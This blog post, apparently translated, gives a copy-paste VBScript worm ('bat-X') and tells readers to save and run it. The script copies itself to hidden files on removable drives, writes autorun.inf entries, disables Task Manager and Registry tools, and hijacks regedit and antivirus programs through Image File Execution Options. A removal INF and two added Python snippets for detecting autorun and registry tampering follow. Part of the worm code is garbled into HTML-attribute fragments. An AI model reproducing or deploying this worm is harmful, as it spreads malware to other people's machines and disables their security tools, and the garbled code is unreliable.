Saturday, December 27, 2008

Make Virus Via NotePad

We will again create a more powerful virus. In case you did not know, I want to apologize because the code in the previous article had an error. Please replace the word "rekursif" with "rekur". If not, a syntax error can occur later.
Now let us open Notepad and type the following code. If you are lazy, just Copy > Paste ....

'Bat-X
'Variant of Kalong.VBS
on error resume next
'Dim words following
rekur dim, windowpath, desades, fs, mf, content, TF, bat, nt, check, sd
'To prepare the content autorun
content = "[autorun]" & vbCrLf & "shellexecute = wscript.exe k4l0n6ms32.dll.vbs"
set fs = createobject ( "Scripting.FileSystemObject")
set mf = fs.getfile (Wscript.ScriptFullname)
dim text, size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream (1, -2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbCrLf
loop
do
'A parent file
Set windowpath = fs.getspecialfolder (0)
set TF = fs.getfile (windowpath & "\ k4l0n6-x.dll.vbs")
tf.attributes = 32
set TF = fs.createtextfile (windowpath & "\ k4l0n6-x.dll.vbs", 2, true)
tf.write rekur
tf.close
set TF = fs.getfile (windowpath & "\ k4l0n6-x.dll.vbs")
tf.attributes = 39
'Sebar added to the removable disc with Autorun.inf
for each desades in fs.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then
set TF = fs.getfile (desades.path & "\ k4l0n6ms32.dll.vbs")
tf.attributes = 32
set TF = fs.createtextfile (desades.path & "\ k4l0n6ms32.dll.vbs", 2, true)
tf.write rekur
tf.close
set TF = fs.getfile (desades.path & "\ k4l0n6ms32.dll.vbs")
tf.attributes = 39
set TF = fs.getfile (desades.path & "\ autorun.inf")
tf.attributes = 32
set TF = fs.createtextfile (desades.path & "\ autorun.inf", 2, true)
tf.write contents
tf.close
set TF = fs.getfile (desades.path & "\ autorun.inf")
tf.attributes = 39
end if
next
'Registry Manipulation
set bat = createobject ( "WScript.Shell")
'Change IE Title
kalong.regwrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ Main \ Window Title ",":: -> bat-X <-:: 2="" a="" advanced="" amp="" and="" application.="" at="" batch-k4l0n6.dll.vbs="" check="" cmd.exe="" currentversion="" debugger="" disableregistrytools="" disabletaskmgr="" during="" execution="" explorer="" file="" files="" folderoptions="" following="" for="" hidden="" i="" idden="" if="" image="" install.exe="" ivert="" kalong.regwrite="" legalnoticecaption="" legalnoticetext="" lock="" manager="" message="" microsoft="" msconfig.exe="" nofind="" nofolderoptions="" norun="" not="" notepad.exe="" notepad="" noviewcontextmenu="" nt="" o="" onus="" opened="" options="" panic="" pcmav-cln.exe="" pcmav-rtp.exe="" pcmav.exe="" policies="" program="" reason="" reate="" regedit.exe="" regedit="" regedt32.exe="" registryeditor.exe="" right-click="" run="" seen="" setup.exe="" software="" startup="" system="" systemdir="" tart="" task="" the="" windowpath="" windows="" winlogon="" with="" x-bat=""> 1 then
Wscript.sleep 200,000
end if
loop while check <> 1
set sd = createobject ( "Wscript.shell")
sd.run windowpath & "\ explorer.exe / e, / select," & Wscript.ScriptFullname
Once you have entered the code, click FILE > SAVE. Under File Type select ALL FILES (*.*) and save with the name k4l0n6ms32.dll.vbs. After that, try running it. And yes, you have now run bat-X.VBS on your computer.
If you open an application named cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, or PCMAV-RTP.exe, Notepad will open instead, more or less like this:
Remember the people that are useful for other people. There are no "dangerous goods" here; it is you who make them dangerous. I am not responsible if you misuse this code. This is for science only. I curse if abused face similar hammer (Wah ... so famous later) ... do not deh. The point of desperation you by your own.
This virus has an Autorun capability, so a computer into which an infected removable disk (for example a flash disk) is plugged will also be infected (if Autorun is not disabled).
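The autorun.inf entry that the script above writes can be recognised statically before a removable disk is trusted. The following Python triage function is an added example, not part of the original post: it parses an autorun.inf and flags launch entries that call an interpreter, reference a script file, or use a double extension. The interpreter and extension lists and both sample files are constructed assumptions.

```python
import re

# Interpreters and script extensions that have no business in an autorun launch entry
# (assumed lists for this example; extend them to suit your environment).
INTERPRETERS = {"wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".bat", ".cmd")
LAUNCH_KEYS = ("open", "shellexecute")


def parse_autorun(text):
    """Return {key: value} for the [autorun] section (keys lower-cased)."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def triage(text):
    """Return (key, reason) findings for the launch entries of an autorun.inf."""
    findings = []
    for key, value in parse_autorun(text).items():
        if key not in LAUNCH_KEYS and not re.fullmatch(r"shell\\[^\\]+\\command", key):
            continue
        tokens = [t.strip('"').lower() for t in value.split()]
        if any(t.rsplit("\\", 1)[-1] in INTERPRETERS for t in tokens):
            findings.append((key, "launches an interpreter"))
        if any(t.endswith(SCRIPT_EXTS) for t in tokens):
            findings.append((key, "references a script file"))
        # A name like "x.dll.vbs" puts a harmless-looking extension ahead of the real one.
        if any(re.search(r"\.(dll|txt|jpg|doc)\.[a-z]{2,4}$", t) for t in tokens):
            findings.append((key, "double extension"))
    return findings


# Constructed samples: the first mirrors the autorun.inf content shown in the script above.
SAMPLE_WORM = "[autorun]\r\nshellexecute = wscript.exe k4l0n6ms32.dll.vbs\r\n"
SAMPLE_BENIGN = "[autorun]\nicon=setup.ico\nlabel=Backup\nopen=setup.exe\n"

if __name__ == "__main__":
    for name, sample in (("worm", SAMPLE_WORM), ("benign", SAMPLE_BENIGN)):
        print(name, triage(sample))
```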
NOTE: Cleaning up bat-X is easy. Just stop the process called wscript.exe. On WinNT you can do so through the Task Manager. On Win9x, look for a Task Manager replacement tool such as Procexp or CurrProcess. I sometimes do it via the Command Prompt.
Once you have stopped the wscript.exe process, remove the parent file called k4l0n6-x.dll.vbs in WINDOWSDIR (C:\Windows, for example). If you do not see it, first show hidden files with Folder Options. Then fix the Registry. To speed this up, copy the following code into Notepad:
[Version]
Signature="$Chicago$"
Provider=Fariskhi
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKCU,"Software\Microsoft\Internet Explorer\Main","Window Title",0,"INTERNET EXPLORER"
[del]
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer",NoFind
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer",NoFolderOptions
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer",NoRun
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\System",DisableRegistryTools
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\System",DisableTaskMgr
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer",NoViewContextMenu
HKLM,"Software\Microsoft\Windows\CurrentVersion\Winlogon",LegalNoticeCaption
HKLM,"Software\Microsoft\Windows\CurrentVersion\Winlogon",LegalNoticeText
HKLM,"Software\Microsoft\Windows\CurrentVersion\Run",Systemdir
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe",Debugger
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe",Debugger
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe",Debugger
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe",Debugger
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe",Debugger
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe",Debugger
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe",Debugger
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe",Debugger
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe",Debugger
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe",Debugger
After that, save with FILE TYPE: ALL FILES (*.*) under the name kalongxremoval.inf. Then right-click the file and select Install. So we have created a virus and its antidote together with Notepad. This tutorial belongs to a friend, but don't worry, I have changed the program syntax in the registry in its
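To check whether the registry changes that the removal file undoes are present on a machine, a regedit export can be audited offline. The following Python function is an added example, not part of the original post: it reports any Image File Execution Options Debugger value and any non-zero policy value named in the removal file. The sample export text is constructed for illustration.

```python
import re

# Policy value names taken from the removal INF above; a non-zero DWORD means the
# restriction is active.
POLICY_VALUES = {"nofind", "nofolderoptions", "norun", "noviewcontextmenu",
                 "disableregistrytools", "disabletaskmgr"}
IFEO = "\\image file execution options\\"


def audit_reg_export(text):
    """Scan regedit export text and return sorted (kind, detail) findings."""
    findings, key = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]          # current registry key
            continue
        m = re.match(r'"([^"]+)"=(.*)$', line)
        if not m:
            continue
        name, data = m.group(1).lower(), m.group(2)
        lkey = key.lower()
        if name == "debugger" and IFEO in lkey:
            # A Debugger value makes Windows start that program instead of the target.
            target = key.rsplit("\\", 1)[-1]
            value = data.strip('"')
            findings.append(("ifeo-debugger", f"{target} -> {value}"))
        elif name in POLICY_VALUES and "\\policies\\" in lkey:
            dword = re.fullmatch(r"dword:([0-9a-fA-F]{8})", data)
            if dword and int(dword.group(1), 16) != 0:
                findings.append(("policy-lockout", m.group(1)))
    return sorted(findings)


# Constructed sample in regedit export format (not captured from a real system).
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe]
"Debugger"="notepad.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"DisableRegistryTools"=dword:00000000
'''

if __name__ == "__main__":
    for finding in audit_reg_export(SAMPLE_EXPORT):
        print(finding)
```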

Source: http://sahammudien.wordpress.com/2007/12/12/make-virus-via-notepad/
